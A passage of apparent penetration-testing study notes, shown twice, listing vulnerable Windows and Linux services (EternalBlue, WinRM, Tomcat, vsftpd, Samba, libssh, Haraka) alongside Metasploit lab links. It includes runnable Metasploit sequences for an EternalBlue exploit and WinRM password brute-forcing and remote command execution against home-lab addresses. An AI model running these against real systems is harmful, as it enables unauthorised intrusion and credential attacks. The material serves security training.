Exploitation

Windows Exploitation

HFS (HTTP File Server)

A HFS (HTTP File Server) is a file and documents sharing web server.

Rejetto HFS - free open source HTTP file server

🔬 HFS - MSF Exploit

SMB - MS17-010 EternalBlue

CVE-2017-0144
EternalBlue VA
- EternalBlue takes advantage of a Windows SMBv1 protocol vulnerability
- Patch was released in March 2017

🔬 Check the Lab 2 - Eternal Blue here

Some MSF useful commands from my Home Lab (Kali VM + Win 2008_R2 Server)

service postgresql start && msfconsole -qdb_statussetg RHOSTS 192.168.31.131setg RHOST 192.168.31.131workspace -a EternalBluedb_nmap -sS -sV -O 192.168.31.131search type:auxiliary EternalBlueuse auxiliary/scanner/smb/smb_ms17_010optionsrunsearch type:exploit EternalBlueuse exploit/windows/smb/ms17_010_eternalblueoptionsrun

WinRM

Identify WinRM users with MSF and exploit WinRM by obtaining access credentials.
Default WinRM HTTP port is 5985 and HTTPS 5986

🔬 WinRM Attack lab

Apache Tomcat

Apache Tomcat is a free open source Java servlet web server, build to host dynamic websites and web apps developed in Java.

Tomcat default TCP port is 8080
Apache web server host HTML/PHP web apps, instead
Apache Tomcat < v.8.5.23 is vulnerable to a JSP Upload Bypass / RCE

🔬 Tomcat - MSF Exploit

Linux Exploitation

FTP

vsftpd is an Unix FTP server.

vsftpd v.2.3.4 is vulnerable to a command execution vulnerability

🔬 FTP - MSF Exploit

SAMBA

Samba is the Linux implementation of SMB.

Samaba v.3.5.0 is vulnerable to a RCE vulnerability

🔬 Samba - MSF Exploit

SSH

libssh is a C library that implements the SSHv2 protocol

SSH default TCP port is 22
libssh v.0.6.0 - 0.8.0 is vulnerable to an authentication bypass vulnerability

🔬 SSH - MSF Exploit

SMTP

Haraka is an open source high performance SMTP server developed in Node.js

SMTP default TCP port is 25
- other TCP ports are 465 and 587
Haraka prior to v.2.8.9 is vulnerable to command injection

🔬 SMTP - MSF Exploit

PreviousClient-Side Attacks NextPost Exploitation

Last updated 1 year ago

Exploitation

Windows Exploitation

HFS (HTTP File Server)

A HFS (HTTP File Server) is a file and documents sharing web server.

Rejetto HFS - free open source HTTP file server

🔬 HFS - MSF Exploit

SMB - MS17-010 EternalBlue

CVE-2017-0144
EternalBlue VA
- EternalBlue takes advantage of a Windows SMBv1 protocol vulnerability
- Patch was released in March 2017

🔬 Check the Lab 2 - Eternal Blue here

Some MSF useful commands from my Home Lab (Kali VM + Win 2008_R2 Server)

WinRM

Identify WinRM users with MSF and exploit WinRM by obtaining access credentials.
Default WinRM HTTP port is 5985 and HTTPS 5986

🔬 WinRM Attack lab

service postgresql start && msfconsole -qdb_statussetg RHOSTS 10.2.27.173setg RHOST 10.2.27.173workspace -a WinRMdb_nmap -sS -sV -O -p- 10.2.27.173# Port 5985 is set up for WinRMsearch type:auxiliary winrmuse auxiliary/scanner/winrm/winrm_auth_methodsoptionsrun# Brute force WinRM loginsearch winrm_loginuse auxiliary/scanner/winrm/winrm_loginset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txtset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txtsearch winrm_cmduse auxiliary/scanner/winrm/winrm_cmdset USERNAME administratorset PASSWORD tinkerbellset CMD whoamirunsearch winrm_scriptuse exploit/windows/winrm/winrm_script_execset USERNAME administratorset PASSWORD tinkerbellset FORCE_VBS trueexploit

Apache Tomcat

Apache Tomcat is a free open source Java servlet web server, build to host dynamic websites and web apps developed in Java.

Tomcat default TCP port is 8080
Apache web server host HTML/PHP web apps, instead
Apache Tomcat < v.8.5.23 is vulnerable to a JSP Upload Bypass / RCE

🔬 Tomcat - MSF Exploit

Linux Exploitation

FTP

vsftpd is an Unix FTP server.

vsftpd v.2.3.4 is vulnerable to a command execution vulnerability

🔬 FTP - MSF Exploit

SAMBA

Samba is the Linux implementation of SMB.

Samaba v.3.5.0 is vulnerable to a RCE vulnerability

🔬 Samba - MSF Exploit

SSH

libssh is a C library that implements the SSHv2 protocol

SSH default TCP port is 22
libssh v.0.6.0 - 0.8.0 is vulnerable to an authentication bypass vulnerability

🔬 SSH - MSF Exploit

SMTP

Haraka is an open source high performance SMTP server developed in Node.js

SMTP default TCP port is 25
- other TCP ports are 465 and 587
Haraka prior to v.2.8.9 is vulnerable to command injection

🔬 SMTP - MSF Exploit

PreviousClient-Side Attacks NextPost Exploitation

Last updated 1 year ago